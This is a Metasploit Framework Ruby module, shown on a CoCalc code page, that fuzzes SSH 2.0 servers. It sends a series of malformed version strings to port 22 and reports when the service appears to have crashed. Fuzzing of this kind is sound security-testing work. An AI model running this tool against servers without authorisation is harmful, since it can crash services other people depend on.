CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
Views: 11783
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Fuzzer
9
10
def initialize(info = {})
11
super(update_info(info,
12
'Name' => 'SSH 2.0 Version Fuzzer',
13
'Description' => %q{
14
This module sends a series of SSH requests with malicious version strings.
15
},
16
'Author' => [ 'hdm' ],
17
'License' => MSF_LICENSE
18
))
19
register_options([
20
Opt::RPORT(22)
21
])
22
end
23
24
def do_ssh_version(pkt,opts={})
25
@connected = false
26
connect
27
@connected = true
28
29
@banner = sock.get_once(-1,opts[:banner_timeout])
30
return if not @banner
31
sock.put("#{pkt}\r\n")
32
end
33
34
def run
35
last_str = nil
36
last_inp = nil
37
last_err = nil
38
39
ver = make_ssh_version_base
40
cnt = 0
41
42
fuzz_strings do |str|
43
cnt += 1
44
45
pkt = ver + str
46
47
if(cnt % 100 == 0)
48
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
49
end
50
51
begin
52
r = do_ssh_version(str,:banner_timeout => 5)
53
rescue ::Interrupt
54
print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")
55
raise $!
56
rescue ::Exception => e
57
last_err = e
58
ensure
59
disconnect
60
end
61
62
if(not @connected)
63
if(last_str)
64
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
65
else
66
print_status("Could not connect to the service: #{last_err}")
67
end
68
return
69
end
70
71
if(not @banner)
72
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
73
return
74
end
75
76
last_str = str
77
last_inp = @last_fuzzer_input
78
end
79
end
80
81
def make_ssh_version_base
82
"SSH-2.0-"
83
end
84
end
85
86